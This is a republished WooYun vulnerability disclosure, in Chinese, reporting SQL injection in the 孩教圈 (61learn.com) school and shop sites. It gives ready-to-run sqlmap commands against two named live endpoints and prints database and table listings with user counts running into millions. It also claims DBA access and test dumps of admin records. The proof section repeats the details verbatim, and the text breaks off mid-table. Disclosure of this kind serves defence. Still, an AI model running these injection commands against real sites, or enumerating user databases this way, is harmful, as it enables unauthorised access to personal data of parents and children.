孩教圈多处SQL注入涉及百万用户数据垮裤查询+dba权限

2017年4月27日03:49:53评论507 views字数 228阅读0分45秒阅读模式

摘要

2016-05-03：细节已通知厂商并且等待厂商处理中
2016-05-03：厂商已经确认，细节仅向厂商公开
2016-05-13：细节向核心白帽子及相关领域专家公开
2016-05-23：细节向普通白帽子公开
2016-06-02：细节向实习白帽子公开
2016-06-17：细节向公众公开

漏洞概要关注数(9) 关注此漏洞

缺陷编号： WooYun-2016-203987

漏洞标题：孩教圈多处SQL注入涉及百万用户数据垮裤查询+dba权限

漏洞作者：黑色键盘丶

提交时间： 2016-05-03 17:25

公开时间： 2016-06-17 17:50

漏洞类型： SQL注射漏洞

危害等级：高

自评Rank： 20

漏洞状态：厂商已经确认

漏洞来源：www.wooyun.org ，如有疑问或需要帮助请联系

Tags标签： php+数字类型注射

0人收藏

漏洞详情

披露状态：

简要描述：

详细说明：

code 区域

注入点1post：sqlmap.py -u "http://school.61learn.com/delete_cart_goods.php" --data
 "id=1" --dbs
 注入点2post：sqlmap.py -u "http://shop.61learn.com/delete_cart_goods.php" --data "i
 d=1" --dbs

数据库信息这里2个库泄露50w用户 bbs库1550w用户

code 区域

back-end DBMS: MySQL 5.0
 available databases [8]:
 [*] #mysql50#
 [*] bbs
 [*] hjq
 [*] information_schema
 [*] mysql
 [*] performance_schema
 [*] school
 [*] test

表信息

code 区域

Database: school
 +------------------------------------------+---------+
 | Table                                    | Entries |
 +------------------------------------------+---------+
 | school_users                             | 248448  |
 | school_wechat_user                       | 237773  |
 | school_wechat_subscribe                  | 163013  |
 | school_wechat_custom_message             | 130199  |
 | school_stats                             | 77608   |
 | school_activity_vote_content             | 76820   |
 | school_activity_vote                     | 76793   |
 | pre_common_member_institution_album      | 33246   |
 | school_admin_log                         | 18653   |
 | pre_common_member_institution_photo      | 13159   |
 | school_goods_age                         | 12381   |
 | school_goods_gallery                     | 12152   |
 | pre_common_member_institution_jg_age     | 10882   |
 | school_seller_shopslide                  | 7327    |
 | school_goods                             | 6742    |
 | school_seller_extend_info                | 6719    |
 | pre_common_member_institution_type       | 6128    |
 | pre_common_member_institution            | 4746    |
 | school_user_seller                       | 4609    |
 | school_commission                        | 4576    |
 | school_admin_user                        | 4573    |
 | school_seller_shopinfo                   | 4507    |
 | school_seller_category                   | 4354    |
 | school_sessions_data                     | 4278    |
 | school_touch_goods                       | 3914    |
 | school_region                            | 3408    |
 | school_activity_commit                   | 1801    |
 | school_sessions                          | 1108    |
 | school_keywords                          | 755     |
 | school_video                             | 656     |
 | tb_school                                | 583     |
 | school_activity_vote_apply               | 314     |
 | school_activity_item                     | 244     |
 | school_pay_log                           | 220     |
 | school_order_info                        | 207     |
 | pre_common_member_institution_temp       | 189     |
 | school_searchengine                      | 183     |
 | school_activity_user_apply               | 181     |
 | school_shop_config                       | 176     |
 | school_activity_type                     | 163     |
 | school_category                          | 123     |
 | pre_common_member_institution_coursetype | 122     |
 | school_admin_action                      | 119     |
 | school_links_type                        | 112     |
 | school_order_goods                       | 111     |
 | school_app_users                         | 107     |
 | pre_common_member_institution_cert       | 105     |
 | school_order_action                      | 95      |
 | school_touch_ad                          | 76      |
 | school_user_address                      | 74      |
 | school_ad                                | 70      |
 | school_article                           | 55      |
 | pre_common_member_institution_message    | 53      |
 | school_activity_field_content            | 50      |
 | school_comment                           | 50      |
 | school_wechat_reply                      | 50      |
 | school_wechat_rule_keywords              | 47      |
 | school_touch_shop_config                 | 46      |
 | school_video_type                        | 46      |
 | school_template                          | 40      |
 | school_account_log                       | 36      |
 | school_wechat_media                      | 36      |
 | school_delivery_goods                    | 23      |
 | school_article_cat                       | 22      |
 | school_touch_ad_position                 | 22      |
 | school_delivery_order                    | 19      |
 | school_area_region                       | 18      |
 | school_activity                          | 17      |
 | school_nav                               | 17      |
 | school_ad_position                       | 16      |
 | school_cat_recommend                     | 16      |
 | pre_common_member_institution_report     | 15      |
 | school_mail_templates                    | 14      |
 | school_shipping                          | 13      |
 | school_shipping_area                     | 13      |
 | school_adsense                           | 10      |
 | school_seller_fields                     | 10      |
 | school_touch_adsense                     | 10      |
 | school_user_bonus                        | 9       |
 | school_touch_nav                         | 8       |
 | school_wechat_menu                       | 8       |
 | pre_common_member_institution_age_type   | 7       |
 | pre_common_member_institution_fans       | 7       |
 | school_touch_feedback                    | 7       |
 | school_back_order                        | 6       |
 | school_collect_goods                     | 6       |
 | school_goods_activity                    | 6       |
 | school_package_goods                     | 6       |
 | school_reg_fields                        | 6       |
 | school_vote_option                       | 6       |
 | pre_common_member_institution_fans_group | 5       |
 | school_attribute                         | 5       |
 | school_touch_activity                    | 5       |
 | school_touch_nav2                        | 5       |
 | school_touch_payment                     | 5       |
 | school_user_rank                         | 5       |
 | school_volume_price                      | 5       |
 | school_bonus_type                        | 4       |
 | school_exchange_goods                    | 4       |
 | school_feedback                          | 4       |
 | school_seller_shopwindow                 | 4       |
 | school_app_page_data                     | 3       |
 | school_back_goods                        | 3       |
 | school_goods_type                        | 3       |
 | school_payment                           | 3       |
 | school_touch_brand                       | 3       |
 | pre_common_member_institution_course     | 2       |
 | pre_common_member_institution_video      | 2       |
 | school_activity_item_select              | 2       |
 | school_friend_link                       | 2       |
 | school_snatch_log                        | 2       |
 | school_suppliers                         | 2       |
 | school_topic                             | 2       |
 | school_touch_goods_activity              | 2       |
 | school_user_account                      | 2       |
 | school_wechat                            | 2       |
 | pre_common_member_institution_bulletin   | 1       |
 | pre_common_member_institution_collection | 1       |
 | school_auction_log                       | 1       |
 | school_booking_goods                     | 1       |
 | school_card                              | 1       |
 | school_email_list                        | 1       |
 | school_favourable_activity               | 1       |
 | school_media_recommend                   | 1       |
 | school_pack                              | 1       |
 | school_seller_nav                        | 1       |
 | school_seller_shopheader                 | 1       |
 | school_store_category                    | 1       |
 | school_street_tags                       | 1       |
 | school_touch_article                     | 1       |
 | school_touch_auth                        | 1       |
 | school_vote                              | 1       |
 | school_wholesale                         | 1       |
 +------------------------------------------+---------+

admin信息4000多条这里测试dump几条

---------------------------------------------------

shop

code 区域

Database: hjq
 +-------------------------+---------+
 | Table                   | Entries |
 +-------------------------+---------+
 | ecs_stats               | 242377  |
 | ecs_ip_log              | 79182   |
 | ecs_user_bonus          | 78836   |
 | ecs_users               | 35892   |
 | wxch_message            | 35443   |
 | ecs_sessions_data       | 26322   |
 | ecs_admin_log           | 23477   |
 | ecs_lucky_egg_record    | 19705   |
 | ecs_keywords            | 14524   |
 | ecs_order_action        | 14413   |
 | ecs_user_address        | 11403   |
 | ecs_account_log         | 11197   |
 | ecs_order_goods         | 11103   |
 | ecs_pay_log             | 10224   |
 | ecs_order_info          | 10014   |
 | ecs_user_op             | 7538    |
 | ecs_goods_gallery       | 4921    |
 | ecs_goods_attr          | 3730    |
 | wxch_user               | 3545    |
 | ecs_region              | 3409    |
 | ecs_collect_goods       | 2138    |
 | ecs_goods_cat           | 1933    |
 | ecs_goods               | 1837    |
 | wxch_point_record       | 1691    |
 | ecs_channel_user        | 1008    |
 | ecs_link_goods          | 938     |
 | ecs_sessions            | 821     |
 | ecs_apply               | 786     |
 | ecs_searchengine        | 651     |
 | ecs_goods_article       | 519     |
 | ecs_feedback            | 390     |
 | wxch_prize_users        | 378     |
 | wxch_prize_cnum         | 327     |
 | wxch_prize_register     | 210     |
 | ecs_article             | 186     |
 | ecs_shop_config         | 179     |
 | ecs_touch_shop_config   | 179     |
 | wxch_prize_count        | 146     |
 | ecs_admin_action        | 115     |
 | ecs_user_account        | 102     |
 | ecs_lucky_egg_ext_code  | 100     |
 | ecs_topic               | 95      |
 | ecs_suppliers           | 80      |
 | ecs_category            | 73      |
 | ecs_area_region         | 69      |
 | ecs_comment             | 67      |
 | ecs_touch_ad            | 56      |
 | ecs_volume_price        | 46      |
 | ecs_bonus_type          | 40      |
 | ecs_template            | 39      |
 | ecs_touch_ad_position   | 39      |
 | ecs_brand               | 38      |
 | ecs_delivery_goods      | 33      |
 | ecs_ad                  | 27      |
 | ecs_attribute           | 27      |
 | ecs_nav                 | 26      |
 | ecs_article_cat         | 19      |
 | ecs_touch_shipping      | 19      |
 | ecs_admin_user          | 18      |
 | ecs_delivery_order      | 18      |
 | wxch_menu               | 18      |
 | wxch_prize_append       | 16      |
 | ecs_cat_recommend       | 15      |
 | ecs_channel             | 14      |
 | ecs_mail_templates      | 14      |
 | ecs_goods_type          | 13      |
 | ecs_touch_nav           | 13      |
 | ecs_goods_activity      | 12      |
 | ecs_touch_template      | 12      |
 | wxch_cfg                | 12      |
 | wxch_lang               | 12      |
 | wxch_msg                | 12      |
 | wxch_point              | 12      |
 | ecs_adsense             | 11      |
 | ecs_lucky_egg           | 11      |
 | ecs_ad_position         | 10      |
 | ecs_conference_signup   | 10      |
 | wxch_keywords_article   | 10      |
 | ecs_school_users        | 7       |
 | ecs_touch_payment       | 7       |
 | wxch_oauth              | 7       |
 | ecs_package_goods       | 6       |
 | ecs_reg_fields          | 6       |
 | ecs_affiliate_log       | 5       |
 | ecs_email_list          | 5       |
 | ecs_email_sendlist      | 5       |
 | ecs_user_rank           | 5       |
 | ecs_bankcard            | 4       |
 | ecs_member_price        | 4       |
 | ecs_payment             | 4       |
 | ecs_school_msg_type     | 4       |
 | ecs_shipping            | 4       |
 | ecs_exchange_goods      | 3       |
 | ecs_favourable_activity | 3       |
 | ecs_school_msg          | 3       |
 | ecs_vote_option         | 3       |
 | wxch_keywords1          | 3       |
 | wxch_order              | 3       |
 | ecs_products            | 2       |
 | ecs_snatch_log          | 2       |
 | wxch_prize              | 2       |
 | wxch_qr                 | 2       |
 | ecs_auction_log         | 1       |
 | ecs_back_goods          | 1       |
 | ecs_back_order          | 1       |
 | ecs_crons               | 1       |
 | ecs_school_class        | 1       |
 | ecs_school_school       | 1       |
 | ecs_shipping_area       | 1       |
 | ecs_touch_shipping_area | 1       |
 | ecs_user_card_type      | 1       |
 | ecs_vote                | 1       |
 | ecs_wholesale           | 1       |
 | wxch_autoreg            | 1       |
 | wxch_config             | 1       |
 | wxch_coupon             | 1       |
 | wxch_keywords           | 1       |
 | wxch_pay                | 1       |
 | wxch_ver                | 1       |
 +-------------------------+---------+

------------------------------------------------------------

bbs表 80多w用户

code 区域

Database: bbs
 +------------------------------------------+---------+
 | Table                                    | Entries |
 +------------------------------------------+---------+
 | pre_forum_forum_member                   | 15686561 |
 | pre_home_notification                    | 1800457 |
 | pre_common_credit_rule_log               | 1739935 |
 | pre_ucenter_pm_members                   | 1359710 |
 | pre_home_follow                          | 1163131 |
 | pre_ucenter_memberfields                 | 865584  |
 | pre_ucenter_members                      | 849251  |
 | pre_common_member                        | 848895  |
 | pre_common_member_profile                | 843376  |
 | pre_common_member_status                 | 843376  |
 | pre_common_member_field_forum            | 843375  |
 | pre_common_member_field_home             | 843375  |
 | pre_common_member_count                  | 843373  |
 | pre_common_member_newprompt              | 744912  |
 | pre_common_member_token                  | 737041  |
 | pre_common_member_verify                 | 736976  |
 | pre_common_member_verify_info            | 736948  |
 | pre_ucenter_pm_indexes                   | 685691  |
 | pre_ucenter_pm_lists                     | 679861  |
 | pre_by_tasklog                           | 661101  |
 | pre_ucenter_newpm                        | 642079  |
 | pre_forum_recent                         | 640153  |
 | `backup_备份表_不要删_pre_common_school_list`        | 282941  |
 | pre_common_school_list                   | 282941  |
 | pre_statistic_activation                 | 202903  |
 | pre_forum_post                           | 166176  |
 | pre_forum_threadpartake                  | 153502  |
 | pre_common_member_position               | 120087  |
 | newusers                                 | 120000  |
 | pre_forum_filter_post                    | 112868  |
 | pre_common_member_children               | 89329   |
 | pre_ucenter_pm_messages_0                | 68757   |
 | pre_ucenter_pm_messages_5                | 68685   |
 | pre_ucenter_pm_messages_6                | 68594   |
 | pre_ucenter_pm_messages_1                | 68583   |
 | pre_ucenter_pm_messages_9                | 68564   |
 | pre_ucenter_pm_messages_8                | 68540   |
 | pre_ucenter_pm_messages_4                | 68523   |
 | pre_ucenter_pm_messages_3                | 68495   |
 | pre_ucenter_pm_messages_7                | 68483   |
 | pre_ucenter_pm_messages_2                | 68467   |
 | pre_forum_attachment                     | 54352   |
 | pre_mobile_sms_code                      | 50012   |
 | pre_forum_indexhot                       | 46624   |
 | pre_common_district                      | 45051   |
 | pre_common_other_infos                   | 44001   |
 | pre_home_favorite                        | 38767   |
 | pre_forum_thread                         | 38044   |
 | ecs_users                                | 35075   |
 | pre_forum_threadmod                      | 25656   |
 | pre_forum_statlog                        | 22828   |
 | pre_common_praise                        | 21519   |
 | pre_common_member_count_archive          | 21248   |
 | pre_common_member_field_forum_archive    | 21248   |
 | pre_common_member_field_home_archive     | 21248   |
 | pre_common_member_status_archive         | 21248   |
 | pre_common_member_profile_archive        | 21247   |
 | pre_common_member_archive                | 21246   |
 | pre_common_onlinetime                    | 19844   |
 | pre_security_evilpost                    | 18848   |
 | pre_common_credit_log                    | 18772   |
 | pre_common_credit_log_field              | 18772   |
 | pre_forum_images_recommend               | 17302   |
 | pre_portal_article_related               | 16792   |
 | pre_forum_huati_isguan                   | 12541   |
 | pre_forum_threadimage                    | 10900   |
 | pre_forum_sofa                           | 6747    |
 | pre_forum_attachment_unused              | 6228    |
 | pre_forum_threadhot                      | 5699    |
 | pre_forum_attachment_6                   | 5640    |
 | pre_forum_attachment_3                   | 5220    |
 | pre_forum_attachment_1                   | 5124    |
 | pre_forum_attachment_2                   | 5107    |
 | pre_forum_attachment_8                   | 5052    |
 | pre_forum_attachment_5                   | 4981    |
 | pre_forum_attachment_4                   | 4941    |
 | pre_forum_attachment_9                   | 4782    |
 | pre_forum_attachment_7                   | 4753    |
 | pre_forum_attachment_0                   | 4684    |
 | pre_forum_modwork                        | 3933    |
 | pre_portal_attachment                    | 3545    |
 | pre_forum_threadcalendar                 | 3137    |
 | pre_common_member_crime                  | 3079    |
 | pre_portal_article_count                 | 3043    |
 | pre_portal_article_content               | 3015    |
 | pre_portal_article_title                 | 2996    |
 | pre_security_eviluser                    | 2959    |
 | pre_forum_huati                          | 2653    |
 | pre_statistic_daylog                     | 2548    |
 | pre_portal_comment                       | 2208    |
 | pre_common_tagitem                       | 2035    |
 | pre_home_pic                             | 1329    |
 | pre_common_credit_rule_log_field         | 1306    |
 | pre_common_block_item                    | 1244    |
 | pre_forum_thread_search_temp             | 1132    |
 | pre_common_tag                           | 1128    |
 | pre_forum_huati_index                    | 1126    |
 | pre_common_member_institution_temp       | 1083    |
 | pre_forum_rsscache                       | 987     |
 | pre_forum_newthread                      | 865     |
 | pre_common_smiley                        | 860     |
 | pre_forum_post_tableid                   | 846     |
 | pre_common_stat                          | 807     |
 | pre_common_member_action_log             | 680     |
 | `backup_国内城市经纬度_不要删`                               | 660     |
 | tb_course                                | 647     |
 | tb_school                                | 583     |
 | pre_common_member_profile_options        | 569     |
 | pre_common_connect_guest                 | 493     |
 | pre_common_setting                       | 447     |
 | pre_common_block                         | 419     |
 | pre_ucenter_feeds                        | 365     |
 | pre_common_seccheck                      | 364     |
 | pre_home_share                           | 359     |
 | pre_common_city                          | 342     |
 | pre_common_school_city                   | 337     |
 | tb_teacher                               | 333     |
 | pre_home_follow_feed_archiver            | 327     |
 | pre_statistic_daylog_login               | 317     |
 | pre_forum_threaddisablepos               | 299     |
 | pre_forum_threadclass                    | 255     |
 | pre_forum_pollvoter                      | 252     |
 | pre_ucenter_notelist                     | 233     |
 | `backup_用户专业领域表_不要删`                               | 231     |
 | pre_connect_memberbindlog                | 187     |
 | pre_common_member_connect                | 180     |
 | pre_common_feedback                      | 172     |
 | pre_home_feed                            | 145     |
 | pre_forum_hotreply_member                | 140     |
 | pre_forum_threadpreview                  | 139     |
 | pre_common_syscache                      | 135     |
 | pre_forum_hotreply_number                | 130     |
 | pre_common_member_institution_coursetype | 122     |
 | pre_forum_polloption                     | 117     |
 | pre_common_block_style                   | 108     |
 | pre_forum_poststick                      | 98      |
 | pre_forum_forumfield                     | 97      |
 | pre_forum_forum                          | 96      |
 | pre_home_friend_request                  | 93      |
 | pre_common_stylevar                      | 90      |
 | pre_common_block_pic                     | 86      |
 | pre_home_friend                          | 74      |
 | pre_common_member_institution_album      | 68      |
 | pre_forum_polloption_image               | 68      |
 | pre_common_admincp_perm                  | 67      |
 | pre_common_nav                           | 62      |
 | pre_common_statuser                      | 58      |
 | pre_common_advertisement_custom          | 54      |
 | pre_common_member_profile_setting        | 51      |
 | pre_home_blacklist                       | 51      |
 | pre_common_member_institution_message    | 50      |
 | pre_mpage_weibo                          | 47      |
 | pre_portal_article_trash                 | 44      |
 | pre_common_advertisement                 | 39      |
 | pre_home_friendlog                       | 39      |
 | pre_common_usergroup_field               | 38      |
 | pre_common_credit_rule                   | 36      |
 | pre_common_optimizer                     | 36      |
 | pre_common_usergroup                     | 36      |
 | pre_common_report                        | 33      |
 | pre_common_school_province               | 31      |
 | pre_forum_moderator                      | 29      |
 | pre_ucenter_settings                     | 27      |
 | pre_common_member_stat_field             | 26      |
 | pre_common_admincp_cmenu                 | 23      |
 | pre_common_word                          | 23      |
 | pre_portal_rsscache                      | 23      |
 | pre_home_album                           | 22      |
 | pre_common_member_institution_photo      | 21      |
 | pre_common_cron                          | 20      |
 | pre_common_cache                         | 17      |
 | pre_dc_mall_address                      | 17      |
 | pre_forum_onlinelist                     | 17      |
 | pre_common_plugin                        | 16      |
 | pre_common_pluginvar                     | 16      |
 | pre_forum_poll                           | 15      |
 | pre_home_click                           | 15      |
 | pre_common_config                        | 13      |
 | pre_home_specialuser                     | 12      |
 | pre_common_diy_data                      | 11      |
 | pre_common_member_institution_report     | 11      |
 | pre_common_searchindex                   | 11      |
 | pre_common_member_institution            | 10      |
 | pre_forum_medal                          | 10      |
 | pre_common_admingroup                    | 9       |
 | pre_common_failedlogin                   | 8       |
 | pre_common_member_institution_cert       | 8       |
 | pre_common_member_institution_type       | 8       |
 | pre_common_member_secwhite               | 8       |
 | pre_home_comment                         | 8       |
 | pre_common_member_institution_age        | 7       |
 | pre_common_member_institution_fans       | 7       |
 | pre_dc_mall_goods                        | 7       |
 | pre_forum_imagetype                      | 7       |
 | pre_common_word_type                     | 6       |
 | pre_forum_typeoption                     | 6       |
 | pre_home_blog                            | 6       |
 | pre_home_blogfield                       | 6       |
 | pre_common_admincp_group                 | 5       |
 | pre_common_member_institution_fans_group | 5       |
 | pre_dc_mall_orders                       | 5       |
 | pre_common_admincp_member                | 4       |
 | pre_common_grouppm                       | 4       |
 | pre_common_member_grouppm                | 4       |
 | pre_connect_postfeedlog                  | 4       |
 | pre_forum_bbcode                         | 4       |
 | pre_home_class                           | 4       |
 | pre_statistic_admin                      | 4       |
 | pre_common_failedip                      | 3       |
 | pre_common_template_block                | 3       |
 | pre_connect_feedlog                      | 3       |
 | pre_forum_access                         | 3       |
 | pre_forum_grouplevel                     | 3       |
 | pre_home_pokearchive                     | 3       |
 | pre_portal_category                      | 3       |
 | pre_common_member_institution_course     | 2       |
 | pre_common_member_institution_video      | 2       |
 | pre_common_style                         | 2       |
 | pre_common_template                      | 2       |
 | pre_forum_forumrecommend                 | 2       |
 | pre_forum_threadtype                     | 2       |
 | pre_forum_warning                        | 2       |
 | pre_home_poke                            | 2       |
 | pre_mobile_setting                       | 2       |
 | pre_statistic_group                      | 2       |
 | pre_ucenter_applications                 | 2       |
 | pre_common_admincp_session               | 1       |
 | pre_common_banned                        | 1       |
 | pre_common_index_module                  | 1       |
 | pre_common_member_institution_bulletin   | 1       |
 | pre_common_member_institution_collection | 1       |
 | pre_common_process                       | 1       |
 | pre_common_secquestion                   | 1       |
 | pre_dc_mall_extend                       | 1       |
 | pre_dc_mall_sort                         | 1       |
 | pre_forum_threadprofile                  | 1       |
 | pre_home_clickuser                       | 1       |
 | pre_ucenter_admins                       | 1       |
 | pre_ucenter_failedlogins                 | 1       |
 +------------------------------------------+---------+

漏洞证明：

code 区域

注入点1post：sqlmap.py -u "http://school.61learn.com/delete_cart_goods.php" --data
 "id=1" --dbs
 注入点2post：sqlmap.py -u "http://shop.61learn.com/delete_cart_goods.php" --data "i
 d=1" --dbs

数据库信息这里2个库泄露50w用户 bbs库1550w用户

code 区域

back-end DBMS: MySQL 5.0
 available databases [8]:
 [*] #mysql50#
 [*] bbs
 [*] hjq
 [*] information_schema
 [*] mysql
 [*] performance_schema
 [*] school
 [*] test

表信息

code 区域

Database: school
 +------------------------------------------+---------+
 | Table                                    | Entries |
 +------------------------------------------+---------+
 | school_users                             | 248448  |
 | school_wechat_user                       | 237773  |
 | school_wechat_subscribe                  | 163013  |
 | school_wechat_custom_message             | 130199  |
 | school_stats                             | 77608   |
 | school_activity_vote_content             | 76820   |
 | school_activity_vote                     | 76793   |
 | pre_common_member_institution_album      | 33246   |
 | school_admin_log                         | 18653   |
 | pre_common_member_institution_photo      | 13159   |
 | school_goods_age                         | 12381   |
 | school_goods_gallery                     | 12152   |
 | pre_common_member_institution_jg_age     | 10882   |
 | school_seller_shopslide                  | 7327    |
 | school_goods                             | 6742    |
 | school_seller_extend_info                | 6719    |
 | pre_common_member_institution_type       | 6128    |
 | pre_common_member_institution            | 4746    |
 | school_user_seller                       | 4609    |
 | school_commission                        | 4576    |
 | school_admin_user                        | 4573    |
 | school_seller_shopinfo                   | 4507    |
 | school_seller_category                   | 4354    |
 | school_sessions_data                     | 4278    |
 | school_touch_goods                       | 3914    |
 | school_region                            | 3408    |
 | school_activity_commit                   | 1801    |
 | school_sessions                          | 1108    |
 | school_keywords                          | 755     |
 | school_video                             | 656     |
 | tb_school                                | 583     |
 | school_activity_vote_apply               | 314     |
 | school_activity_item                     | 244     |
 | school_pay_log                           | 220     |
 | school_order_info                        | 207     |
 | pre_common_member_institution_temp       | 189     |
 | school_searchengine                      | 183     |
 | school_activity_user_apply               | 181     |
 | school_shop_config                       | 176     |
 | school_activity_type                     | 163     |
 | school_category                          | 123     |
 | pre_common_member_institution_coursetype | 122     |
 | school_admin_action                      | 119     |
 | school_links_type                        | 112     |
 | school_order_goods                       | 111     |
 | school_app_users                         | 107     |
 | pre_common_member_institution_cert       | 105     |
 | school_order_action                      | 95      |
 | school_touch_ad                          | 76      |
 | school_user_address                      | 74      |
 | school_ad                                | 70      |
 | school_article                           | 55      |
 | pre_common_member_institution_message    | 53      |
 | school_activity_field_content            | 50      |
 | school_comment                           | 50      |
 | school_wechat_reply                      | 50      |
 | school_wechat_rule_keywords              | 47      |
 | school_touch_shop_config                 | 46      |
 | school_video_type                        | 46      |
 | school_template                          | 40      |
 | school_account_log                       | 36      |
 | school_wechat_media                      | 36      |
 | school_delivery_goods                    | 23      |
 | school_article_cat                       | 22      |
 | school_touch_ad_position                 | 22      |
 | school_delivery_order                    | 19      |
 | school_area_region                       | 18      |
 | school_activity                          | 17      |
 | school_nav                               | 17      |
 | school_ad_position                       | 16      |
 | school_cat_recommend                     | 16      |
 | pre_common_member_institution_report     | 15      |
 | school_mail_templates                    | 14      |
 | school_shipping                          | 13      |
 | school_shipping_area                     | 13      |
 | school_adsense                           | 10      |
 | school_seller_fields                     | 10      |
 | school_touch_adsense                     | 10      |
 | school_user_bonus                        | 9       |
 | school_touch_nav                         | 8       |
 | school_wechat_menu                       | 8       |
 | pre_common_member_institution_age_type   | 7       |
 | pre_common_member_institution_fans       | 7       |
 | school_touch_feedback                    | 7       |
 | school_back_order                        | 6       |
 | school_collect_goods                     | 6       |
 | school_goods_activity                    | 6       |
 | school_package_goods                     | 6       |
 | school_reg_fields                        | 6       |
 | school_vote_option                       | 6       |
 | pre_common_member_institution_fans_group | 5       |
 | school_attribute                         | 5       |
 | school_touch_activity                    | 5       |
 | school_touch_nav2                        | 5       |
 | school_touch_payment                     | 5       |
 | school_user_rank                         | 5       |
 | school_volume_price                      | 5       |
 | school_bonus_type                        | 4       |
 | school_exchange_goods                    | 4       |
 | school_feedback                          | 4       |
 | school_seller_shopwindow                 | 4       |
 | school_app_page_data                     | 3       |
 | school_back_goods                        | 3       |
 | school_goods_type                        | 3       |
 | school_payment                           | 3       |
 | school_touch_brand                       | 3       |
 | pre_common_member_institution_course     | 2       |
 | pre_common_member_institution_video      | 2       |
 | school_activity_item_select              | 2       |
 | school_friend_link                       | 2       |
 | school_snatch_log                        | 2       |
 | school_suppliers                         | 2       |
 | school_topic                             | 2       |
 | school_touch_goods_activity              | 2       |
 | school_user_account                      | 2       |
 | school_wechat                            | 2       |
 | pre_common_member_institution_bulletin   | 1       |
 | pre_common_member_institution_collection | 1       |
 | school_auction_log                       | 1       |
 | school_booking_goods                     | 1       |
 | school_card                              | 1       |
 | school_email_list                        | 1       |
 | school_favourable_activity               | 1       |
 | school_media_recommend                   | 1       |
 | school_pack                              | 1       |
 | school_seller_nav                        | 1       |
 | school_seller_shopheader                 | 1       |
 | school_store_category                    | 1       |
 | school_street_tags                       | 1       |
 | school_touch_article                     | 1       |
 | school_touch_auth                        | 1       |
 | school_vote                              | 1       |
 | school_wholesale                         | 1       |
 +------------------------------------------+---------+

admin信息4000多条这里测试dump几条

---------------------------------------------------

shop

code 区域

Database: hjq
 +-------------------------+---------+
 | Table                   | Entries |
 +-------------------------+---------+
 | ecs_stats               | 242377  |
 | ecs_ip_log              | 79182   |
 | ecs_user_bonus          | 78836   |
 | ecs_users               | 35892   |
 | wxch_message            | 35443   |
 | ecs_sessions_data       | 26322   |
 | ecs_admin_log           | 23477   |
 | ecs_lucky_egg_record    | 19705   |
 | ecs_keywords            | 14524   |
 | ecs_order_action        | 14413   |
 | ecs_user_address        | 11403   |
 | ecs_account_log         | 11197   |
 | ecs_order_goods         | 11103   |
 | ecs_pay_log             | 10224   |
 | ecs_order_info          | 10014   |
 | ecs_user_op             | 7538    |
 | ecs_goods_gallery       | 4921    |
 | ecs_goods_attr          | 3730    |
 | wxch_user               | 3545    |
 | ecs_region              | 3409    |
 | ecs_collect_goods       | 2138    |
 | ecs_goods_cat           | 1933    |
 | ecs_goods               | 1837    |
 | wxch_point_record       | 1691    |
 | ecs_channel_user        | 1008    |
 | ecs_link_goods          | 938     |
 | ecs_sessions            | 821     |
 | ecs_apply               | 786     |
 | ecs_searchengine        | 651     |
 | ecs_goods_article       | 519     |
 | ecs_feedback            | 390     |
 | wxch_prize_users        | 378     |
 | wxch_prize_cnum         | 327     |
 | wxch_prize_register     | 210     |
 | ecs_article             | 186     |
 | ecs_shop_config         | 179     |
 | ecs_touch_shop_config   | 179     |
 | wxch_prize_count        | 146     |
 | ecs_admin_action        | 115     |
 | ecs_user_account        | 102     |
 | ecs_lucky_egg_ext_code  | 100     |
 | ecs_topic               | 95      |
 | ecs_suppliers           | 80      |
 | ecs_category            | 73      |
 | ecs_area_region         | 69      |
 | ecs_comment             | 67      |
 | ecs_touch_ad            | 56      |
 | ecs_volume_price        | 46      |
 | ecs_bonus_type          | 40      |
 | ecs_template            | 39      |
 | ecs_touch_ad_position   | 39      |
 | ecs_brand               | 38      |
 | ecs_delivery_goods      | 33      |
 | ecs_ad                  | 27      |
 | ecs_attribute           | 27      |
 | ecs_nav                 | 26      |
 | ecs_article_cat         | 19      |
 | ecs_touch_shipping      | 19      |
 | ecs_admin_user          | 18      |
 | ecs_delivery_order      | 18      |
 | wxch_menu               | 18      |
 | wxch_prize_append       | 16      |
 | ecs_cat_recommend       | 15      |
 | ecs_channel             | 14      |
 | ecs_mail_templates      | 14      |
 | ecs_goods_type          | 13      |
 | ecs_touch_nav           | 13      |
 | ecs_goods_activity      | 12      |
 | ecs_touch_template      | 12      |
 | wxch_cfg                | 12      |
 | wxch_lang               | 12      |
 | wxch_msg                | 12      |
 | wxch_point              | 12      |
 | ecs_adsense             | 11      |
 | ecs_lucky_egg           | 11      |
 | ecs_ad_position         | 10      |
 | ecs_conference_signup   | 10      |
 | wxch_keywords_article   | 10      |
 | ecs_school_users        | 7       |
 | ecs_touch_payment       | 7       |
 | wxch_oauth              | 7       |
 | ecs_package_goods       | 6       |
 | ecs_reg_fields          | 6       |
 | ecs_affiliate_log       | 5       |
 | ecs_email_list          | 5       |
 | ecs_email_sendlist      | 5       |
 | ecs_user_rank           | 5       |
 | ecs_bankcard            | 4       |
 | ecs_member_price        | 4       |
 | ecs_payment             | 4       |
 | ecs_school_msg_type     | 4       |
 | ecs_shipping            | 4       |
 | ecs_exchange_goods      | 3       |
 | ecs_favourable_activity | 3       |
 | ecs_school_msg          | 3       |
 | ecs_vote_option         | 3       |
 | wxch_keywords1          | 3       |
 | wxch_order              | 3       |
 | ecs_products            | 2       |
 | ecs_snatch_log          | 2       |
 | wxch_prize              | 2       |
 | wxch_qr                 | 2       |
 | ecs_auction_log         | 1       |
 | ecs_back_goods          | 1       |
 | ecs_back_order          | 1       |
 | ecs_crons               | 1       |
 | ecs_school_class        | 1       |
 | ecs_school_school       | 1       |
 | ecs_shipping_area       | 1       |
 | ecs_touch_shipping_area | 1       |
 | ecs_user_card_type      | 1       |
 | ecs_vote                | 1       |
 | ecs_wholesale           | 1       |
 | wxch_autoreg            | 1       |
 | wxch_config             | 1       |
 | wxch_coupon             | 1       |
 | wxch_keywords           | 1       |
 | wxch_pay                | 1       |
 | wxch_ver                | 1       |
 +-------------------------+---------+

------------------------------------------------------------

bbs表 80多w用户

code 区域

Database: bbs
 +------------------------------------------+---------+
 | Table                                    | Entries |
 +------------------------------------------+---------+
 | pre_forum_forum_member                   | 15686561 |
 | pre_home_notification                    | 1800457 |
 | pre_common_credit_rule_log               | 1739935 |
 | pre_ucenter_pm_members                   | 1359710 |
 | pre_home_follow                          | 1163131 |
 | pre_ucenter_memberfields                 | 865584  |
 | pre_ucenter_members                      | 849251  |
 | pre_common_member                        | 848895  |
 | pre_common_member_profile                | 843376  |
 | pre_common_member_status                 | 843376  |
 | pre_common_member_field_forum            | 843375  |
 | pre_common_member_field_home             | 843375  |
